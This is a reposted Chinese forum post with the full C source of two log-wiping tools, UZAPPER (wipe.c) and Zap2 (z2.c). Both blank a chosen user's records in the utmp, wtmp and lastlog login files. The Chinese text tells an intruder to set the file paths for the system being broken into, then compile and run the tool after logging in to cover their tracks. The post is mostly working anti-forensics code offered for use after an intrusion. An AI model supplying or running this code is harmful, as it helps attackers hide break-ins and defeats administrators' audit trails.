（转载）wipe.c and z2.c

/*=============================================================================

UZAPPER Ver1.00 for Solaris, SunOS, IRIX, Linux, FreeBSD

The Shadow Penguin Security ( http://shadowpenguin.backsection.net )

Written by UNYUN ( unewn4th@usa.net )

=============================================================================

*/

 

#include <stdio.h>

#include <fcntl.h>

#include <unistd.h>

#include <utmp.h>

 

#ifdef UTMAXTYPE

#define UTMPX

#include <utmpx.h>

#endif

#include <pwd.h>

#ifndef _PATH_LASTLOG

#include <lastlog.h>

#endif

#include <sys/types.h>

#include <sys/stat.h>

#include <sys/utsname.h>

 

#define SVR4_UTMP "/var/adm/utmp"

#define SVR4_WTMP "/var/adm/wtmp"

#define SVR4_LASTLOG "/var/adm/lastlog"

 

#define SUNOS4_UTMP "/etc/utmp"

#define SUNOS4_WTMP "/usr/adm/wtmp"

#define SUNOS4_LASTLOG "/usr/adm/lastlog"

 

#define BSD_UTMP "/var/run/utmp"

#define BSD_WTMP "/var/log/wtmp"

#define BSD_LASTLOG "/var/log/lastlog"

 

#define MAX_FPATH 512

 

int wipe_log(path,user,type)

char *path,*user;

int type;

{

struct utmp utmp_ent;

#ifdef UTMPX

struct utmpx utmpx_ent;

#endif

void *ent;

char *un;

int sz,fd,c=0;

 

if (strlen(path)==0) return(1);

if (type==0){

ent=(void *)&utmp_ent;

#ifdef UTMPX

un=(char *)&utmp_ent.ut_user;

#else

un=(char *)&utmp_ent.ut_name;

#endif

sz=sizeof(struct utmp);

}else{

#ifdef UTMPX

ent=(void *)&utmpx_ent;

un=(char *)&utmpx_ent.ut_user;

sz=sizeof(struct utmpx);

#endif

}

if ((fd=open(path,O_RDWR))<=0) return(-1);

while(read(fd,ent,sz)>0)

if (!strncmp(un,user,strlen(user))){

memset(ent,0,sz);

lseek(fd,-sz,SEEK_CUR);

write(fd,ent,sz);

c++;

}

close(fd);

printf("Wiped %d entries of %s from %s.\n",c,user,path);

return(0);

}

 

int wipe_lastlog(path,user,type)

char *path,*user;

int type;

{

struct passwd *p;

struct lastlog ent;

int fd;

char buffer[MAX_FPATH];

 

if (type==0) strcpy(buffer,path);

else sprintf(buffer,"%s/%s",path,user);

memset(&ent,0,sizeof(struct lastlog));

if ((p=getpwnam(user))==NULL) return(-1);

if ((fd=open(buffer,O_RDWR))<=0) return(-2);

if (type==0)

lseek(fd,p->pw_uid*sizeof(struct lastlog),SEEK_SET);

write(fd,&ent,sizeof(struct lastlog));

close(fd);

printf("Wiped %s from %s.\n",user,path);

return(0);

}

 

main(argc,argv)

int argc;

char *argv[];

{

char f_utmp[MAX_FPATH],f_utmpx[MAX_FPATH];

char f_wtmp[MAX_FPATH],f_wtmpx[MAX_FPATH];

char f_lastlog[MAX_FPATH];

struct utsname utname;

int lastlog_type;

 

if (argc!=2){

printf("Usage: %s Usernane\n",argv[0]);

exit(1);

}

if (getpwnam(argv[1])==NULL){

printf("Unknown user : %s\n",argv[1]);

exit(1);

}

uname(&utname);

strcpy(f_wtmpx,""); strcpy(f_utmpx,"");

if (!strcmp(utname.sysname,"SunOS")){

#ifdef UTMPX

strcpy(f_utmp, SVR4_UTMP);

strcpy(f_wtmp, SVR4_WTMP);

strcpy(f_utmpx, UTMPX_FILE);

strcpy(f_wtmpx, WTMPX_FILE);

strcpy(f_lastlog, SVR4_LASTLOG);

lastlog_type=0;

#else

strcpy(f_utmp, SUNOS4_UTMP);

strcpy(f_wtmp, SUNOS4_WTMP);

strcpy(f_lastlog, SUNOS4_LASTLOG);

lastlog_type=0;

#endif

}else if (!strcmp(utname.sysname,"Linux")

|| !strcmp(utname.sysname,"FreeBSD")){

strcpy(f_utmp, BSD_UTMP);

strcpy(f_wtmp, BSD_WTMP);

strcpy(f_lastlog, BSD_LASTLOG);

}else if (!strcmp(utname.sysname,"IRIX")){

#ifdef UTMPX

strcpy(f_utmp, SVR4_UTMP);

strcpy(f_wtmp, SVR4_WTMP);

strcpy(f_utmpx, UTMPX_FILE);

strcpy(f_wtmpx, WTMPX_FILE);

strcpy(f_lastlog, SVR4_LASTLOG);

lastlog_type=1;

#else

printf("Can not wipe. System Unknown.\n");

#endif

}else

printf("Can not wipe. System Unknown.\n");

 

wipe_log(f_utmp, argv[1],0);

wipe_log(f_utmpx,argv[1],1);

wipe_log(f_wtmp, argv[1],0);

wipe_log(f_wtmpx,argv[1],1);

wipe_lastlog(f_lastlog,argv[1],lastlog_type);

}
编译好的wipe
其中 u 选项为 utmp utmpx 日志擦除．.
w 选项为 wtmp wtmpx 日志擦除．
l 选项为 lastlog 日志擦除．
a 为/var/adm/pacct日志擦除

Zap2 （清除 wtmp/lastlog/utmp记录）
我们先来完成z2这个程序。你必须了解每个文件在你入侵的系统中的位置以便修改z2.c，使其包含这些文件的正确路径。
下面是在文件头部的需要你修改的部分。
#define WTMP_NAME "/usr/adm/wtmp"
#define UTMP_NAME "/etc/utmp"
#define LASTLOG_NAME "/usr/adm/lastlog"
在有些系统中应该是：
#define WTMP_NAME "/var/adm/wtmp"
#define UTMP_NAME "/var/adm/utmp"
#define LASTLOG_NAME "/var/adm/lastlog"

但你应该自己查看一下这些文件存放在你要入侵的系统的什么位置。/var/log目录也是很可能的一个路径。修改好正确的文件路径后，编译这个文件，现在你登录之后运行z2，你就已比较安全了。
这里是c程序：
z2.c
--------------------------- cut here
#include <sys/types.h>
#include <stdio.h>
#include <unistd.h>
#include <sys/file.h>
#include <fcntl.h>
#include <utmp.h>
#include <pwd.h>
#include <lastlog.h>
#define WTMP_NAME "/usr/adm/wtmp"
#define UTMP_NAME "/etc/utmp"
#define LASTLOG_NAME "/usr/adm/lastlog"

int f;

void kill_utmp(who)
char *who;
{
struct utmp utmp_ent;

if ((f=open(UTMP_NAME,O_RDWR))>=0) {
while(read (f, &utmp_ent, sizeof (utmp_ent))> 0 )
if (!strncmp(utmp_ent.ut_name,who,strlen(who))) {
bzero((char *)&utmp_ent,sizeof( utmp_ent ));
lseek (f, -(sizeof (utmp_ent)), SEEK_CUR);
write (f, &utmp_ent, sizeof (utmp_ent));
}
close(f);
}
}

void kill_wtmp(who)
char *who;
{
struct utmp utmp_ent;
long pos;

pos = 1L;
if ((f=open(WTMP_NAME,O_RDWR))>=0) {

while(pos != -1L) {
lseek(f,-(long)( (sizeof(struct utmp)) * pos),L_XTND);
if (read (f, &utmp_ent, sizeof (struct utmp))<0) {
pos = -1L;
} else {
if (!strncmp(utmp_ent.ut_name,who,strlen(who))) {
bzero((char *)&utmp_ent,sizeof(struct utmp ));
lseek(f,-( (sizeof(struct utmp)) * pos),L_XTND);
write (f, &utmp_ent, sizeof (utmp_ent));
pos = -1L;
} else pos += 1L;
}
}
close(f);
}
}

void kill_lastlog(who)
char *who;
{
struct passwd *pwd;
struct lastlog newll;

if ((pwd=getpwnam(who))!=NULL) {

if ((f=open(LASTLOG_NAME, O_RDWR)) >= 0) {
lseek(f, (long)pwd->pw_uid * sizeof (struct lastlog), 0);
bzero((char *)&newll,sizeof( newll ));
write(f, (char *)&newll, sizeof( newll ));
close(f);
}

} else printf("%s: ?\n",who);
}

main(argc,argv)
int argc;
char *argv[];
{
if (argc==2) {
kill_lastlog(argv[1]);
kill_wtmp(argv[1]);
kill_utmp(argv[1]);
printf("Zap2!\n");
} else
printf("Error.\n");
}